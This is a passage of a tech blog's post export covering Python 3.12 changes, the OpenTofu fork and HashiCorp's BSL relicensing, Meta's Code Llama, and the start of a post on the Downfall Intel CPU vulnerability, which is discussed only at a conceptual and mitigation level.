2023","externalUrl":null,"permalink":"/posts/230914-unity-runtime-fee-developer-trust/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Unity’s announcement of a per-install runtime fee has sent shockwaves through the game development community, and the lessons extend far beyond gaming.","title":"Unity's Runtime Fee — When a Platform Betrays Developer Trust","type":"posts"},{"content":"Python 3.12 is now at release candidate 2, and the final release is expected in October. I\u0026rsquo;ve been testing it against some of my projects, and I\u0026rsquo;m genuinely impressed. This isn\u0026rsquo;t a flashy release with headline-grabbing new syntax — it\u0026rsquo;s a disciplined, engineering-focused update that addresses real pain points. After thirty years of watching programming languages evolve, I can tell you: these are the releases that matter most.\nThe Performance Story Continues # The Faster CPython project, led by Mark Shannon and supported by Microsoft, is delivering on its promises. Python 3.11 gave us a 10-25% speedup, and 3.12 continues that trajectory with additional optimizations to the interpreter loop and object creation paths.\nThe most significant performance work in 3.12 is the implementation of PEP 669 — Low Impact Monitoring for CPython. This overhauls how debugging and profiling tools hook into the interpreter. Previously, having a debugger or profiler attached would slow down all code execution, even code that wasn\u0026rsquo;t being monitored. With PEP 669, monitoring has near-zero overhead for code that isn\u0026rsquo;t being actively watched.\nIf you\u0026rsquo;ve ever noticed your test suite running significantly slower under coverage.py, or your application getting sluggish when a profiler is attached, this is directly relevant. The new monitoring API means tools can be more surgical about what they instrument, and the interpreter doesn\u0026rsquo;t pay a tax just because a monitoring tool is loaded.\nFor those of us who routinely profile production systems, this is a meaningful quality-of-life improvement. I\u0026rsquo;ve always been cautious about running profilers in production precisely because of the performance overhead. PEP 669 could change that calculus.\nBetter Error Messages, Better Developer Experience # Python 3.10 introduced better error messages, and 3.11 expanded on them with fine-grained exception locations. Python 3.12 takes another step with improved suggestions for common mistakes. The interpreter now provides more helpful \u0026ldquo;did you mean?\u0026rdquo; suggestions for NameError, ImportError, and SyntaxError.\nFor example, if you type import datetime and then reference datetime.datatime.now(), the error message will now suggest datetime.datetime. These seem like small things, but they add up. I mentor junior developers regularly, and I can tell you that cryptic error messages are one of the biggest sources of frustration for people learning the language. Every improvement here lowers the barrier to entry.\nThe error messages for invalid escape sequences in strings have also been upgraded from DeprecationWarning to SyntaxWarning, which is a signal that these will become errors in a future release. If you have \u0026quot;\\d+\u0026quot; in your regex strings without using raw strings (r\u0026quot;\\d+\u0026quot;), now\u0026rsquo;s the time to clean those up.\nType System Improvements # Python\u0026rsquo;s gradual typing story continues to mature with 3.12. The headline feature is PEP 695, which introduces a new, cleaner syntax for type parameters. Instead of the somewhat clunky:\nfrom typing import TypeVar T = TypeVar(\u0026#39;T\u0026#39;) def first(l: list[T]) -\u0026gt; T: return l[0] You can now write:\ndef first[T](l: list[T]) -\u0026gt; T: return l[0] This syntax also works for classes and type aliases:\ntype Vector[T] = list[T] class Stack[T]: def push(self, item: T) -\u0026gt; None: ... def pop(self) -\u0026gt; T: ... The type statement for type aliases (PEP 695) is cleaner and more intuitive than TypeAlias. If you\u0026rsquo;ve worked with generics in TypeScript, Rust, or Java, this syntax will feel immediately familiar. Python\u0026rsquo;s type system has been evolving rapidly, and this release makes it feel substantially more natural.\nThe No-GIL Future Takes Shape # Perhaps the most architecturally significant work in 3.12 is the foundation for PEP 684 — per-interpreter GIL. This allows multiple Python interpreters within the same process to have their own Global Interpreter Lock, enabling true parallelism for certain workloads. This continues the performance focus that began with Faster CPython in 3.11.\nThis is distinct from the full \u0026ldquo;no-GIL\u0026rdquo; proposal (PEP 703), which Sam Gross has been developing and the Python Steering Council is evaluating. But PEP 684 is an important stepping stone. It enables parallelism through sub-interpreters without the ecosystem disruption of removing the GIL entirely.\nFor most Python developers, the GIL has been a known limitation that you work around with multiprocessing or async I/O. The per-interpreter GIL won\u0026rsquo;t change your daily workflow immediately, but it\u0026rsquo;s laying groundwork for a future where CPU-bound Python code can truly utilize multiple cores without the overhead of separate processes.\nI\u0026rsquo;ve been following the GIL discussion for years, and what impresses me about the current approach is its pragmatism. Rather than a revolutionary change that breaks the entire C extension ecosystem, the CPython team is taking an incremental path. That\u0026rsquo;s the kind of engineering discipline that keeps a language healthy for decades.\nPractical Migration Considerations # If you\u0026rsquo;re planning to upgrade to 3.12, here are the things I\u0026rsquo;d watch for:\nDeprecated removals: Several long-deprecated modules have been removed, including distutils (use setuptools instead), asynchat, asyncore, and imp. If you\u0026rsquo;re maintaining older codebases, audit your imports before upgrading.\nString escaping: The strengthened warnings about invalid escape sequences mean your CI might suddenly light up with warnings. Address them now rather than waiting for them to become errors.\nf-string changes: F-strings in 3.12 have been reimplemented to remove several previous limitations. You can now nest quotes freely, use backslashes, and even include comments in multi-line f-strings. This is mostly additive, but if you had workarounds for the old limitations, you can simplify your code.\nTyping: If you adopt the new type parameter syntax, your code will require 3.12+ to run. For libraries that need to support older versions, you\u0026rsquo;ll want to stick with the TypeVar approach for now.\nMy Take # Python 3.12 is a release that makes me optimistic about the language\u0026rsquo;s trajectory. After the Python 2 EOL transition and years of hearing \u0026ldquo;Python is too slow\u0026rdquo; and \u0026ldquo;the GIL makes Python useless for parallel work,\u0026rdquo; the CPython team is systematically addressing these criticisms without breaking the ecosystem.\nThe performance improvements are real and cumulative. The developer experience keeps getting better. The type system is maturing into something genuinely useful rather than just a bolted-on afterthought. And the GIL work suggests a future where Python\u0026rsquo;s concurrency story is competitive with languages that have always had it easier.\nIf you haven\u0026rsquo;t tested your projects against the release candidate, I\u0026rsquo;d encourage you to try it. The migration is typically smooth, and the benefits are tangible. Python remains one of the most productive languages for a huge range of tasks, and 3.12 makes it measurably better.\n","date":"7 September 2023","externalUrl":null,"permalink":"/posts/230907-python-312-what-developers-need-to-know/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Python 3.12 is in release candidate stage with major performance improvements, better error messages, and the foundations of a no-GIL future.","title":"Python 3.12 — A Performance-Focused Release Worth Getting Excited About","type":"posts"},{"content":"The infrastructure-as-code world is experiencing its biggest upheaval in years. Two weeks ago, HashiCorp announced they were moving Terraform (along with all their other products) from the Mozilla Public License 2.0 to the Business Source License (BSL) 1.1. The community response was swift and decisive: a coalition of companies and contributors launched the OpenTofu manifesto, pledging to maintain a truly open-source fork of Terraform. As someone who\u0026rsquo;s been deploying infrastructure with Terraform since its early days, I have thoughts.\nWhat the BSL Change Actually Means # Let\u0026rsquo;s cut through the noise and understand what the BSL license actually restricts. Under the new terms, you can still use Terraform freely for internal purposes. You can view, modify, and even redistribute the code. What you can\u0026rsquo;t do is offer a competing commercial product that embeds or is built on top of Terraform. The BSL converts to a fully open-source Apache 2.0 license after four years.\nOn paper, this sounds reasonable — HashiCorp is protecting their business from cloud providers who were building managed Terraform services without contributing back. And they have a point: the \u0026ldquo;open source commoditization\u0026rdquo; playbook that AWS and others have run against Redis, Elasticsearch, and MongoDB is well-documented.\nBut the devil is in the details. The BSL\u0026rsquo;s competitive use restriction is intentionally vague. What counts as a \u0026ldquo;competing\u0026rdquo; product? If I build an internal platform that manages Terraform runs for my organization, am I competing with Terraform Cloud? If a consultancy builds tooling around Terraform for their clients, is that competitive? HashiCorp says they\u0026rsquo;ll clarify through an FAQ, but legal ambiguity is itself a problem when you\u0026rsquo;re choosing foundational infrastructure.\nWhy OpenTofu Matters # The OpenTofu initiative — initially called OpenTF — isn\u0026rsquo;t just a angry reaction. It\u0026rsquo;s backed by serious players: Gruntwork, Spacelift, env0, Scalr, and numerous other companies that have built their businesses around the Terraform ecosystem. The Linux Foundation is involved in governance discussions. As of this week, the manifesto has gathered hundreds of signatures from companies and over a thousand individual contributors.\nThe fork will be based on Terraform 1.5.x, the last version released under the MPL. The stated goal is to keep the project community-driven, vendor-neutral, and under a genuinely open-source license.\nWhat gives me cautious optimism is that the core technical work of Terraform isn\u0026rsquo;t magic — it\u0026rsquo;s excellent engineering, but it\u0026rsquo;s engineering that a motivated community can maintain and extend. The infrastructure-as-code landscape continues to evolve, as shown by later consolidation around infrastructure tools. The provider ecosystem, which is arguably Terraform\u0026rsquo;s greatest strength, is largely community-maintained already. Most providers are developed by the cloud vendors themselves or by community contributors, not by HashiCorp employees.\nLessons from History # I\u0026rsquo;ve seen this pattern before. When Oracle acquired Sun and the MySQL community got nervous, MariaDB was forked and has thrived as an independent project. When Elasticsearch moved to a non-open-source license, the OpenSearch fork emerged and has gained substantial adoption. CentOS Stream\u0026rsquo;s shift away from being a stable RHEL rebuild gave us Rocky Linux and AlmaLinux.\nThe pattern is clear: when a widely-adopted open-source project changes its social contract with the community, viable forks emerge. But not all forks succeed. The ones that thrive have strong governance, serious backing, and enough engineering talent to keep up with the pace of development.\nOpenTofu seems to be checking those boxes. The corporate backing provides resources, the Linux Foundation involvement suggests mature governance, and the contributor pool is deep enough. But execution will determine everything. Maintaining compatibility, keeping the provider ecosystem working, and building the kind of boring reliability that infrastructure tools require — that\u0026rsquo;s the hard part.\nWhat This Means for Your Terraform Deployments # If you\u0026rsquo;re running Terraform in production today — and based on the surveys I\u0026rsquo;ve seen, about 60% of organizations doing infrastructure-as-code are — you don\u0026rsquo;t need to panic. The BSL doesn\u0026rsquo;t affect your ability to use Terraform internally. Your existing workflows, state files, and modules will continue to work.\nBut if you\u0026rsquo;re making longer-term strategic decisions about your infrastructure-as-code tooling, this is worth paying attention to. A few questions I\u0026rsquo;d be asking:\nAre you dependent on the open-source ecosystem? If your Terraform setup relies heavily on community modules and third-party tooling, those ecosystem participants may gradually shift their focus to OpenTofu. This isn\u0026rsquo;t a tomorrow problem, but it could become a next-year problem.\nAre you building tools on top of Terraform? If your platform team has built internal tooling that wraps or extends Terraform, the BSL\u0026rsquo;s competitive use clause creates legal ambiguity you should probably discuss with your counsel.\nHow do you feel about vendor lock-in? The BSL means HashiCorp can, at any point, steer Terraform\u0026rsquo;s development to favor their commercial products. That\u0026rsquo;s their right, but it\u0026rsquo;s a strategic consideration for organizations that prefer truly neutral tools.\nFor my own projects, I\u0026rsquo;m watching OpenTofu closely. I won\u0026rsquo;t switch tomorrow — stability matters more than ideology when you\u0026rsquo;re managing production infrastructure. But I\u0026rsquo;m mentally preparing for the possibility and keeping my configurations as portable as possible.\nMy Take # I understand HashiCorp\u0026rsquo;s frustration. Building and maintaining open-source infrastructure is expensive, and watching cloud providers monetize your work without contributing back is genuinely unfair. But I think the BSL was the wrong solution. It breaks trust with the community that helped build Terraform into the standard it is today.\nThe right approach, in my view, would have been stronger copyleft licensing or working with the cloud providers on contribution agreements. The nuclear option of changing the license on a project with this much community investment was always going to trigger exactly this response. This dynamic mirrors broader concerns about open source governance and community relationships.\nWhat I hope comes out of this is a healthy OpenTofu project that maintains the spirit of what made Terraform great, and a HashiCorp that competes on the strength of their commercial offerings rather than on license restrictions. The infrastructure-as-code space benefits from competition, and having both Terraform and OpenTofu pushing each other forward is better than a monopoly under either license model.\nThe next few months will be telling. If OpenTofu can ship a credible 1.6 release and maintain provider compatibility, we might be looking at the most significant fork in the DevOps ecosystem since Jenkins split from Hudson. The broader platform engineering evolution will be shaped by how these infrastructure-as-code tools mature. Stay tuned.\n","date":"31 August 2023","externalUrl":null,"permalink":"/posts/230831-opentofu-terraform-fork-open-source/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"HashiCorp’s switch to the Business Source License has triggered a community fork of Terraform called OpenTofu, and the implications for infrastructure-as-code are enormous.","title":"OpenTofu — The Community Fights Back Against Terraform's License Change","type":"posts"},{"content":"Today Meta released Code Llama, a family of large language models specifically fine-tuned for code generation, and I think this deserves more attention than it\u0026rsquo;s getting. Built on top of Llama 2, these models come in three sizes — 7B, 13B, and 34B parameters — and they\u0026rsquo;re available under a permissive license that allows both research and commercial use. In a landscape where GitHub Copilot and ChatGPT have dominated the AI coding conversation, having a truly open-source alternative is a significant shift.\nWhat Code Llama Actually Brings to the Table # Let\u0026rsquo;s be clear about what we\u0026rsquo;re looking at. Code Llama isn\u0026rsquo;t just \u0026ldquo;Llama 2 but for code.\u0026rdquo; Meta trained these models on an additional 500 billion tokens of code-heavy data, and then created specialized variants. The base Code Llama handles general code tasks, Code Llama - Instruct follows natural language instructions, and Code Llama - Python is optimized specifically for Python development.\nThe 34B parameter model reportedly scores 53.7% on HumanEval, which puts it in competitive territory with GPT-3.5 for code generation tasks. The smaller 7B and 13B models are particularly interesting because they can run on consumer hardware — I\u0026rsquo;ve already seen people in the community getting the 7B model running on M1 MacBooks with reasonable inference speeds.\nWhat makes this practically useful is the context window. Code Llama supports up to 100,000 tokens of context, which means it can process and reason about substantial codebases. If you\u0026rsquo;ve ever been frustrated by Copilot losing track of your project structure mid-suggestion, that context length matters.\nThe Open Source Angle Changes Everything # Here\u0026rsquo;s where I get genuinely excited. For the past year, the AI coding assistant space has been effectively a closed shop. Copilot runs on OpenAI\u0026rsquo;s models, Amazon CodeWhisperer uses proprietary technology, and Tabnine recently moved toward larger proprietary models. If you wanted a serious AI coding assistant, you were renting access to someone else\u0026rsquo;s infrastructure.\nCode Llama changes that calculus. With models you can download, fine-tune, and host yourself, organizations now have a path to AI-assisted development that doesn\u0026rsquo;t require sending their proprietary code to a third-party API. This addresses the fundamental tension between AI capabilities and data security that enterprises must balance. I\u0026rsquo;ve spoken with several CTOs over the past months who were interested in AI coding tools but couldn\u0026rsquo;t get past the security review — their compliance teams wouldn\u0026rsquo;t approve sending source code to external services. Self-hosted Code Llama could be exactly what these organizations need.\nThe fine-tuning aspect is equally important. Imagine training Code Llama on your organization\u0026rsquo;s specific codebase, coding standards, and internal libraries. A model that knows your patterns, your frameworks, and your conventions could be dramatically more useful than a general-purpose coding assistant.\nPractical Considerations and Limitations # Before anyone rushes to replace their Copilot subscription, let\u0026rsquo;s be realistic about the current state. The 7B model, while runnable on consumer hardware, is noticeably less capable than the 34B variant. And even the 34B model, while impressive, still lags behind GPT-4 on complex reasoning tasks that involve understanding broader software architecture.\nRunning the 34B model requires serious GPU resources — we\u0026rsquo;re talking about at least an A100 or equivalent for reasonable inference speeds in a production setting. That\u0026rsquo;s not cheap, and the operational complexity of hosting and maintaining your own ML infrastructure shouldn\u0026rsquo;t be underestimated. I\u0026rsquo;ve run enough self-hosted services over the years to know that the total cost of ownership often surprises people.\nThere\u0026rsquo;s also the question of tooling. Copilot\u0026rsquo;s strength isn\u0026rsquo;t just the model — it\u0026rsquo;s the deep VS Code integration, the seamless inline suggestions, and the context-gathering that happens behind the scenes. The Code Llama models are just models; building the IDE integration, the prompt engineering pipeline, and the serving infrastructure is substantial engineering work.\nThe Competitive Dynamics Are Getting Interesting # Meta\u0026rsquo;s strategy here is fascinating from a business perspective. They don\u0026rsquo;t sell AI coding tools, so giving away competitive models costs them nothing in direct revenue while potentially undermining competitors who do. It\u0026rsquo;s the same playbook they ran with React — give away infrastructure to commoditize the complement.\nFor GitHub and Microsoft, this creates an interesting pressure. If open-source alternatives get good enough, the willingness to pay $19/month for Copilot decreases. Microsoft will likely need to keep Copilot meaningfully ahead to justify the subscription, which means the pace of improvement benefits everyone.\nI\u0026rsquo;m also watching to see how the broader open-source AI community builds on this. The Llama 2 release spawned an incredible ecosystem of fine-tunes, quantizations, and tools in just a few weeks. I expect we\u0026rsquo;ll see specialized Code Llama variants for specific languages, frameworks, and use cases within a month.\nMy Take # I\u0026rsquo;ve been writing code professionally for three decades, and I\u0026rsquo;ve watched many \u0026ldquo;this changes everything\u0026rdquo; moments come and go. Code Llama isn\u0026rsquo;t going to replace human developers — let\u0026rsquo;s get that out of the way. But it represents something I think is genuinely important: the democratization of AI coding assistance.\nThe fact that any developer, any company, any university can now download a competitive code generation model and build on it is powerful. It means the benefits of AI-assisted development won\u0026rsquo;t be locked behind corporate subscriptions. It means researchers can study and improve these systems openly. And it means the competitive pressure will drive everyone — open source and commercial — to build better tools.\nIf you\u0026rsquo;re a developer who hasn\u0026rsquo;t yet explored AI coding assistants, Code Llama might be a good place to start. No subscription, no API keys, no code leaving your machine. Just download, run, and experiment. That\u0026rsquo;s how open source should work.\nThis is the kind of release that reshapes the landscape not through a single dramatic moment, but through a thousand small experiments that follow. I\u0026rsquo;m looking forward to seeing what people build.\n","date":"24 August 2023","externalUrl":null,"permalink":"/posts/230824-code-llama-open-source-code-generation/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Meta releases Code Llama, a family of open-source code generation models, and it might just change the dynamics of AI-assisted development.","title":"Code Llama — Meta's Open Source Bet on AI-Assisted Coding","type":"posts"},{"content":"Python 3.12.0rc1 landed this week, marking the final stretch before the October release. Having tracked Python\u0026rsquo;s evolution for most of my career, this release feels like a particularly significant one. Not because of any single headline feature, but because several long-running efforts are converging in ways that matter for real-world Python development.\nLet me walk through what\u0026rsquo;s actually changing and why it matters for your projects.\nPer-Interpreter GIL: The Beginning of the End # The biggest technical story in Python 3.12 isn\u0026rsquo;t a user-facing feature — it\u0026rsquo;s PEP 684, which introduces per-interpreter GIL support. For those who haven\u0026rsquo;t followed the saga, the Global Interpreter Lock (GIL) has been Python\u0026rsquo;s most famous limitation for decades. It prevents true parallel execution of Python bytecode across threads, which is why CPU-bound Python programs don\u0026rsquo;t scale across cores.\nPEP 684 doesn\u0026rsquo;t remove the GIL. What it does is allow each sub-interpreter to have its own GIL, meaning multiple interpreters running in the same process can execute Python code truly in parallel. This is the foundation for PEP 554 (multiple interpreters in the stdlib), which isn\u0026rsquo;t in 3.12 but is coming.\nThe practical impact for 3.12 is limited — the C API for per-interpreter GIL exists, but the Python-level interface isn\u0026rsquo;t ready yet. Think of this as laying the plumbing. But the direction is clear: Python is systematically addressing its concurrency limitations without breaking backward compatibility. Combined with Sam Gross\u0026rsquo;s PEP 703 for an optional GIL-free build (which the steering council is evaluating), the Python concurrency story is about to change significantly.\nImproved Error Messages Continue # Python 3.10 introduced better error messages, and 3.11 expanded on them. Python 3.12 pushes even further. The improvements are targeted and practical:\nModules that shadow standard library modules now get helpful suggestions when imports fail. If you\u0026rsquo;ve got a file called random.py in your project and import random breaks, Python now tells you why NameError suggestions now cover more cases, including suggesting self.x when you forget self in method bodies ImportError messages for from module import name now suggest similar names from the module These seem small, but they compound. I work with teams where junior developers lose significant time to cryptic error messages. Every improvement here reduces friction. I\u0026rsquo;ve seen the shadow module issue alone cost new Python developers hours of confusion — having the interpreter just tell you what\u0026rsquo;s wrong is a meaningful quality-of-life improvement.\nType System Enhancements # Python\u0026rsquo;s gradual typing story continues to evolve. 3.12 introduces PEP 695, which provides new syntax for type parameter declarations:\n# Old way from typing import TypeVar T = TypeVar(\u0026#39;T\u0026#39;) def first(lst: list[T]) -\u0026gt; T: return lst[0] # New 3.12 way def first[T](lst: list[T]) -\u0026gt; T: return lst[0] The new syntax is cleaner and more intuitive, especially for developers coming from TypeScript or Rust where generic syntax is similar. Type aliases also get a dedicated keyword:\ntype Vector = list[float] type Matrix[T] = list[list[T]] For teams that have adopted type hints — and you should — this reduces boilerplate and makes generic code more readable. The typing module has been accumulating syntax debt as it evolved from a third-party library to a core language feature, and PEP 695 is a significant step toward cleaning that up.\nPerformance: The Specializing Interpreter Matures # Python 3.11 introduced the specializing adaptive interpreter, which optimizes frequently-executed bytecode instructions based on the types they encounter. Python 3.12 builds on this with additional specialization opportunities and better comprehension performance.\nComprehensions now use inline bytecode rather than creating a hidden nested function, which reduces overhead for list, dict, and set comprehensions. This is a common Python pattern, and making it faster benefits virtually every Python codebase.\nThe overall performance improvement over 3.11 is more modest than the dramatic 3.10→3.11 jump (which was 10-60% faster). But the cumulative effect of 3.10→3.11→3.12 is substantial. If you\u0026rsquo;re still on 3.9 or 3.10, upgrading to 3.12 should deliver measurable speedups for most workloads.\nRemoved Features and Breaking Changes # Python 3.12 removes several deprecated features that have been on notice for years. The biggest ones:\ndistutils is gone: Fully removed after being deprecated since 3.10. If you haven\u0026rsquo;t migrated your build tooling to setuptools or another build backend, this is your forcing function Old typing aliases: Several deprecated typing constructs are removed asynchat, asyncore, and imp: Long-deprecated modules finally disappear The distutils removal will break some older packages and build scripts. If you maintain internal packages, test your builds against 3.12rc1 now rather than discovering issues after the October release.\nMy Take # Python\u0026rsquo;s trajectory under its current development model is steady and positive. The language isn\u0026rsquo;t making dramatic leaps — it\u0026rsquo;s systematically addressing known pain points while maintaining backward compatibility. That\u0026rsquo;s exactly what a mature language with Python\u0026rsquo;s install base should be doing.\nThe per-interpreter GIL work is the most strategically important change, even though its practical impact in 3.12 is minimal. It signals that the core team is serious about making Python a viable choice for CPU-parallel workloads — something that\u0026rsquo;s been a perennial complaint and a common reason teams reach for Go or Rust.\nFor production teams, I\u0026rsquo;d recommend testing against the RC now and planning a 3.12 upgrade for Q1 2024 (after the initial patch releases stabilize). The combination of performance improvements, better error messages, and cleaner type syntax makes it a worthwhile upgrade for any Python shop.\nThe language keeps getting better in the ways that matter. That\u0026rsquo;s worth celebrating.\n","date":"17 August 2023","externalUrl":null,"permalink":"/posts/230817-python-312-release-candidate/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Python 3.12’s first release candidate arrives with major performance improvements, better error messages, and the groundwork for removing the GIL.","title":"Python 3.12 RC1 Drops — What Developers Should Know","type":"posts"},{"content":"HashiCorp announced today that they\u0026rsquo;re relicensing all their products — Terraform, Vault, Consul, Nomad, Packer, Vagrant, Waypoint, and Boundary — from the Mozilla Public License 2.0 (MPL 2.0) to the Business Source License (BSL 1.1). The change takes effect immediately for new releases. If you use any of these tools, and if you\u0026rsquo;re doing DevOps in 2023 you almost certainly use at least Terraform, this affects you. This continues a troubling pattern in infrastructure software.\nThe infrastructure-as-code community is reacting with a mix of anger, resignation, and frantic evaluation of alternatives. Let me walk through what\u0026rsquo;s actually changing and what it means.\nWhat the BSL Actually Means # The Business Source License, originally created by MariaDB, is not an open-source license. The Open Source Initiative (OSI) does not recognize it as such, and it doesn\u0026rsquo;t meet the Open Source Definition. Under BSL 1.1, you can view, modify, and redistribute the source code, but you cannot use it for \u0026ldquo;production\u0026rdquo; purposes that compete with HashiCorp\u0026rsquo;s commercial offerings.\nThe specific restriction in HashiCorp\u0026rsquo;s BSL is: you cannot provide a competing commercial product or service that uses the covered code. After four years, the code converts to MPL 2.0 — so today\u0026rsquo;s Terraform release will become genuinely open source in 2027. But the current, actively maintained version? That\u0026rsquo;s BSL.\nFor most end users who deploy their own infrastructure using Terraform, nothing changes in practice. You can still use Terraform to manage your AWS, Azure, or Google Cloud resources. The restriction targets companies that offer Terraform-as-a-service or embed Terraform functionality in competing infrastructure management platforms.\nWho This Actually Affects # The obvious targets are companies that compete with HashiCorp Cloud Platform (HCP): Terraform Cloud competitors like Spacelift, env0, and Scalr. Managed service providers who offer Terraform-based infrastructure management are also in the crosshairs. These companies have built businesses on top of HashiCorp\u0026rsquo;s open-source tools, and the BSL specifically targets their use case.\nBut the restriction\u0026rsquo;s boundaries are ambiguous enough to create uncertainty for a much wider set of users. If your company uses Terraform internally but also sells infrastructure services, does that count as \u0026ldquo;competitive\u0026rdquo;? If you\u0026rsquo;ve built internal tooling around Terraform that you want to productize, are you in violation? HashiCorp has published an FAQ attempting to clarify these boundaries, but licensing ambiguity is itself a risk.\nFor platform teams inside enterprises, the practical impact may be minimal today. But the precedent it sets — and the possibility of future restriction changes — introduces a new category of risk into your infrastructure tooling decisions.\nThe Open Source Trust Deficit # HashiCorp\u0026rsquo;s decision follows a pattern we\u0026rsquo;ve seen repeatedly: MongoDB (SSPL), Elasticsearch (SSPL/Elastic License), Redis (Commons Clause, then RSAL), Confluent (Community License), and now HashiCorp (BSL). Each company follows the same playbook: build an open-source project, attract contributions and adoption, build a business around managed services, then change the license when AWS or other cloud providers start offering competing managed services.\nI understand the business logic. Cloud providers genuinely do free-ride on open-source projects, offering managed versions without contributing proportionally back. HashiCorp\u0026rsquo;s annual revenue is around $500 million, but their market cap has been declining, and the pressure to protect their Terraform Cloud business is real.\nBut each license change erodes trust in the \u0026ldquo;open-source to commercial\u0026rdquo; model. Companies evaluating infrastructure tooling now have to factor in license change risk. \u0026ldquo;It\u0026rsquo;s open source\u0026rdquo; used to mean something about long-term availability and control. Now it comes with an asterisk: \u0026ldquo;until the company decides it\u0026rsquo;s not.\u0026rdquo;\nThe Technical Implications # From a technical standpoint, the last MPL-licensed version of Terraform (1.5.x) remains available and can be forked. The Terraform provider ecosystem — all those AWS, Azure, GCP, and community providers — are separate projects with their own licenses, and they remain open source.\nThis means a community fork is technically feasible. The question is whether anyone has the resources and motivation to maintain a fork of something as complex as Terraform\u0026rsquo;s core. Early conversations are already happening in the community about exactly this possibility. The providers can be shared between the original and any fork, which lowers the barrier significantly.\nFor teams currently using Terraform, my immediate recommendation is: don\u0026rsquo;t panic, but start planning. Pin your Terraform version, evaluate your actual exposure to the BSL restrictions, and begin assessing alternatives like Pulumi, CDK for Terraform, or even CloudFormation/ARM/Deployment Manager if you\u0026rsquo;re single-cloud. None of these are drop-in replacements, but understanding your options now is better than scrambling later.\nThe Broader DevOps Tool Landscape # This move has implications beyond Terraform. HashiCorp\u0026rsquo;s entire portfolio is affected. Vault is widely used for secrets management. Consul for service discovery. Packer for image building. If you\u0026rsquo;ve built your infrastructure platform on the HashiCorp stack — and many organizations have — you\u0026rsquo;re now dependent on BSL-licensed software across multiple critical components. The community response will parallel what we saw with Redis and other open source licensing shifts.\nThe good news is that the DevOps tool landscape has matured significantly. For almost every HashiCorp product, credible alternatives exist. The bad news is that migration is expensive, especially for deeply integrated tools like Vault where the switching costs include re-encrypting secrets, updating every application\u0026rsquo;s secrets retrieval logic, and retraining operations teams.\nMy Take # I\u0026rsquo;ve used Terraform since the 0.x days. I\u0026rsquo;ve written providers, built modules, and advocated for infrastructure as code in organizations that were skeptical. This license change doesn\u0026rsquo;t erase any of that value, but it does change the relationship.\nThe BSL isn\u0026rsquo;t the end of the world for most users. But it is a signal. It tells us that \u0026ldquo;open source\u0026rdquo; in the VC-backed infrastructure space is a growth strategy, not a commitment. And it means that our technology choices need to account for licensing risk alongside technical merit.\nIf you\u0026rsquo;re starting a new project today, I\u0026rsquo;d look hard at the alternatives before defaulting to Terraform. If you\u0026rsquo;re already invested, keep using it — but start treating your Terraform investment the way you\u0026rsquo;d treat any proprietary vendor dependency: with clear exit criteria and a migration plan on the shelf.\nThe open-source model isn\u0026rsquo;t broken, but the \u0026ldquo;open-source-until-IPO\u0026rdquo; model clearly is.\n","date":"10 August 2023","externalUrl":null,"permalink":"/posts/230810-hashicorp-terraform-bsl-license/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"HashiCorp’s decision to relicense Terraform and other products under the Business Source License has sent shockwaves through the infrastructure community.","title":"HashiCorp Switches Terraform to BSL — The Open Source World Reacts","type":"posts"},{"content":"Just when you thought we\u0026rsquo;d moved past the era of headline-grabbing CPU vulnerabilities, a new one arrives to remind us that the speculative execution attack surface is far from exhausted. Security researcher Daniel Moghimi has disclosed Downfall (CVE-2022-40982), a vulnerability affecting Intel processors from the 6th through 11th generations — essentially every Intel CPU shipped between 2015 and 2021. If you\u0026rsquo;re running workloads on Intel hardware in the cloud or on-premises, this one needs your attention.\nWhat Downfall Actually Exploits # Downfall exploits a flaw in the Gather instruction, which is used to access scattered data in memory. The vulnerability allows an attacker to steal data from other processes, virtual machines, or even SGX (Software Guard Extensions) enclaves running on the same physical core.\nThe technical mechanism is a variant of the transient execution attacks we\u0026rsquo;ve been dealing with since Spectre and Meltdown hit in 2018. During speculative execution, the Gather instruction can leak the contents of internal vector register files. Moghimi\u0026rsquo;s proof-of-concept demonstrates stealing AES-128 and AES-256 cryptographic keys from other processes, as well as arbitrary data from the Linux kernel.\nWhat makes Downfall particularly concerning is the reliability and speed of the attack. Unlike some speculative execution vulnerabilities that require precise timing and produce noisy results, Moghimi reports being able to extract data at rates of up to 8 bytes per second with high reliability. That\u0026rsquo;s fast enough to steal cryptographic keys in seconds.\nThe Affected Hardware Landscape # The vulnerability impacts Intel Core processors from Skylake (6th gen) through Tiger Lake (11th gen), as well as corresponding Xeon server processors. This is an enormous install base. Every major cloud provider — AWS, Azure, Google Cloud — runs significant amounts of affected Intel hardware.\nImportantly, 12th gen Alder Lake and newer processors are not affected, as Intel changed the microarchitecture in ways that don\u0026rsquo;t exhibit this behavior. But the long tail of 6th-through-11th-gen processors in production environments means this vulnerability will be relevant for years.\nIntel has released microcode updates that mitigate the vulnerability, and these are being distributed through operating system and firmware updates. The mitigation works by disabling the optimization in the Gather instruction that enables the leak.\nThe Performance Tax # Here\u0026rsquo;s where it gets painful for operations teams: the microcode mitigation has a measurable performance impact. Intel\u0026rsquo;s own documentation acknowledges potential performance degradation, and early benchmarks suggest the impact varies significantly by workload.\nWorkloads that heavily use AVX2/AVX-512 Gather instructions — which includes many HPC, scientific computing, database, and machine learning workloads — can see performance drops of 30-50% on the affected code paths. General-purpose workloads see much smaller impacts, typically in the single-digit percentages.\nThis creates an uncomfortable decision for infrastructure teams. Do you apply the mitigation and accept the performance hit, or do you assess your threat model and potentially leave the vulnerability unpatched? For multi-tenant environments like cloud platforms, there\u0026rsquo;s no real choice — the providers will patch. But for dedicated infrastructure running trusted workloads, the calculus is different.\nI\u0026rsquo;ve been through this exact decision process with Spectre and Meltdown mitigations, and my advice is the same: patch first, benchmark second, and only consider disabling mitigations if you have a strong threat model justification and compensating controls. The performance impact on most real-world workloads is lower than the synthetic benchmarks suggest.\nCloud Provider Response # The major cloud providers have been coordinating with Intel on this disclosure and are rolling out microcode updates across their fleets. AWS has already begun patching affected instances, and Azure and Google Cloud are following similar timelines.\nFor cloud users, the key question is whether you need to take any action beyond what the provider handles. If you\u0026rsquo;re running VMs, the host-level microcode update protects you from cross-VM attacks. But if you\u0026rsquo;re running untrusted code within a VM — think serverless functions, container orchestration with shared nodes, or CI/CD runners — you may want to evaluate whether kernel-level mitigations are also needed.\nThe SGX implications are worth special attention for anyone 